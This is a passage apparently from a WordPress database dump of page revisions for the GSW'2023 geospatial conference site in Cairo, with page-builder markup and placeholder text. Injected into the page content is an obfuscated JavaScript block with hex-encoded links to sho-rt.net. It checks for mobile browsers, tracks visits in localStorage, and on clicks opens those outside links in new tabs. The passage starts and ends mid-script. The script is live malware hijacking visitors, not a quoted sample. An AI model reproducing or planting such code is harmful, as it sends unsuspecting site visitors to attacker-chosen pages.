_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:09:15','2022-11-09 15:09:15','',3066,'https://gsw2023.com/?p=3129',0,'revision','',0),
(3130,1,'2022-11-09 15:10:04','2022-11-09 15:10:04','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_size=\"awb_lg\" awb_image_background_size=\"contain\" awb_image_background_position=\"0% 100%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 